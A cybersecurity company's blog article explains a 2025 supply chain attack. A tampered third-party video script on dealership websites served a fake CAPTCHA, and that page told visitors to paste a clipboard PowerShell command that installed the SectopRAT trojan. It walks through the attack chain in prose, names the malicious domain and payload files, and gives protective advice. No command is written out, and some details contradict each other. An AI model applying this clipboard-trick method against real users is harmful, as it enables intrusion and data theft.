Imagine visiting your favorite car dealership’s website, maybe to schedule a test drive, watch a car review video, or browse new arrivals. Everything looks normal until a pop-up interrupts, asking you to prove you’re not a robot. It seems simple: you follow instructions and paste a command into your Windows Run prompt. However, this action unintentionally exposes you to cybercriminals. That’s exactly what happened to thousands of visitors in a massive attack that exploited over one hundred car dealerships across the United States. The breach came through a third-party video provider that dealerships trusted, making the incident a textbook example of a supply chain attack.
Every dealership website using the service automatically loaded the malicious code that the attackers inserted into a widely used video script. This allowed the attackers to serve a fake security check that manipulated users into infecting their devices with a powerful remote access trojan called SectopRAT. This article explains how it happened, who might be responsible, what the damage looks like, and, most importantly, how you can protect yourself from such deceptive cyber threats.
What actually happened?
In March 2025, cybersecurity experts uncovered a highly advanced cyber campaign that affected more than one hundred car dealership websites. The attackers exploited LES Automotive, a third-party service provider, rather than directly hacking these websites. LES offered video content tools embedded on dealership sites to display promotional videos, which were hosted and updated centrally.
The attackers successfully altered the JavaScript file, incorporating their own malicious code. As a result, any dealership website using the script automatically started loading the modified version.
These websites automatically redirected visitors to a fake CAPTCHA page hosted at a domain named securityconfirmation.help. This page displayed a seemingly harmless prompt saying, “Verify you are not a robot.” It mimicked a standard Google-style CAPTCHA to build trust.
What made this attack different was what came next. The page used JavaScript to silently copy a Windows PowerShell command into the user’s copy buffer. It then instructed the visitor to open the Run prompt on their PC, paste the command, and press Enter. Once executed, that command downloaded and installed a remote access tool called SectopRAT, silently giving attackers control over the victim’s system.
This was not a typical phishing link. It was a hidden attack, using a trusted video script to reach a large audience, many of whom had no reason to suspect foul play. The impact involved unauthorized system access, data theft, and the potential for further attacks such as ransomware or credential harvesting.
How The Supply Chain Attack Hited 100 Car Dealerships
Here is a detailed walkthrough of how the cyberattack unfolded:
Vendor Compromise
The attackers first infiltrated LES Automotive, the video service provider used by car dealerships. They likely gained access either through stolen login credentials or by exploiting a vulnerability in the provider’s system. Once inside, they had the power to modify shared scripts.
Malicious Script Injection
The attackers edited the video script file, inserting obfuscated (hidden) JavaScript code. This new code included a link to a fake CAPTCHA page designed to trick users.
Fake Captcha Page Delivered
When a user visited a dealership website, they were redirected to a page called captchav2.html. It was hosted on a malicious domain and looked just like a standard “I’m not a robot” checkbox—nothing suspicious at first glance.
Clipboard Trickery
Behind the scenes, the fake CAPTCHA silently inserted a PowerShell command into the user’s clipboard. Once the user clicked the checkbox, they were prompted to press Windows + R to open the Run dialog, paste the preloaded command, and press Enter—unknowingly executing malicious code on their system.
Malware Download and Execution
That command fetched a file named Lancaster.zip from a remote server. It extracted an executable called zkwindow.exe and silently ran it, infecting the victim’s PC with SectopRAT.
SectopRAT is an advanced remote access trojan.
Persistent Backdoor Created
Once inside, SectopRAT stayed hidden but gave attackers full control. They could steal passwords, monitor browsing activity, or even use the infected system in future fraud or ransomware campaigns.
The dealerships themselves escaped direct hacking because the code arrived through a trusted vendor script. However, their websites became silent delivery vehicles for malware.
Who Was Behind the Attack?
While no one has officially claimed responsibility, several clues point to a cybercriminal group believed to operate out of Russian-speaking regions.
For example, comments found in the JavaScript code were written in Russian, suggesting the attackers’ origin or at least their language preference. The use of SectopRAT also adds weight to this theory, as this specific remote access tool has historically been used by organized cybercrime groups from Eastern Europe.
The attack method closely resembles previous incidents linked to a suspected group responsible for the BlackSuit ransomware. That group was behind the June 2024 breach of CDK Global, a major software vendor for car dealerships. That earlier attack shut down thousands of dealership systems across the country, leading to widespread disruption and financial loss.
In this 2025 incident, the attackers used a more subtle method. Instead of disrupting operations, they silently infected consumers. Their objective was to exfiltrate sensitive data and set up future fraud operations. The fact that they chose LES Automotive, used by many dealerships, shows how carefully they selected their target. It was not random; it was strategic, calculated, and executed by experienced cybercriminals.
Everything from the scripting tactics to the malware choice indicates that the attack was not the work of amateurs. It reflects planning, technical capability, and an understanding of the U.S. auto industry’s digital ecosystem.
Consequences and Financial Impacts
The impact of this cyberattack is broad, affecting both consumers and businesses. For visitors to the dealership websites, the consequences were immediate but not always visible. Those who followed the fake CAPTCHA’s instructions unknowingly installed malware. The act paved the way for the theft of personal data, the compromise of credentials, and the potential for future ransomware attacks or financial fraud.
Although their internal systems were compromised, dealerships faced significant harm to their reputations. Customers depend on brands to guarantee their online security. Tricking visitors into downloading malware through a dealership site shatters that trust. The result? Customers lose trust in the dealership, they face possible legal consequences, and they face increasing pressure to demonstrate the reliability of their digital security.
To understand the financial impact, consider the 2024 CDK Global breach. That incident caused disruptions costing more than 605 million dollars within just two weeks. Experts estimate that the total financial damage could eventually cross the one billion dollar mark. Although the dealership systems remained operational in this case, the widespread malware infections may carry similar costs, especially if class-action lawsuits or federal investigations follow.
Additionally, consumers affected by identity theft or ransomware might suffer losses of tens of thousands of dollars per person. Regulatory bodies like the U.S. Federal Trade Commission are paying close attention, and companies that fail to safeguard user data can face significant fines. This event is not just a tech issue; it has become a public trust and consumer protection concern.
How to Protect Yourself
To reduce your risk, whether you’re a consumer or a business, follow these best practices:
1. Never run commands from random sources. If a website tells you to copy a command into Windows Run, that is a major red flag.
2. Use strong endpoint protection. Good antivirus or endpoint detection software can stop malware, including remote access tools like SectopRAT.
3. Carefully evaluate your third-party vendors. Please ensure they utilize signed scripts and provide version control. Unsigned or dynamically loaded scripts are easier to tamper with.
4. Monitor all third-party script changes. Use tools that check for unexpected changes to shared assets like JavaScript files.
5. Keep vendor codes in isolated zones. Isolating a compromised script from sensitive systems can limit its damage.
6. Train users and employees. Awareness is one of the best defenses against social engineering tricks like fake captchas and clipboard attacks.
7. Have an incident response plan. Know in advance how your team will handle a cyber incident so you can respond quickly and effectively.
Final Thoughts
This attack reminds us that cybersecurity is often weakest at the supply chain level. A single third-party vendor with poor security can compromise dozens or even hundreds of other systems. In this case, the impact on many dealerships was not due to system flaws but rather to their reliance on an unverified script from a vendor.
Here are the some checklist for you:
- Always vet and monitor external scripts and services.
- Use security solutions that detect unusual behavior patterns, not just known malware.
- Educate your team and customers about the risks of social engineering.
- Plan for worst-case scenarios through detailed response protocols.
- And finally, as an internet user, treat any instruction to paste commands on your computer with extreme caution. As a business, treat every third-party integration as a possible vulnerability.
Did you find this article helpful? Or want to know more about our Cybersecurity Products Services?
Explore our main services >>
Mobile Security
Endpoint Security
Deep and Dark Web Monitoring
ISO Certification and AI-Management System
Web Application Security Testing
Penetration Testing
For more services go to our homepage
Follow us on X (Twitter), LinkedIn for more Cyber Security news and updates. Stay connected on YouTube, Facebook and Instagram as well. At Hoplon Infosec, we’re committed to securing your digital world.
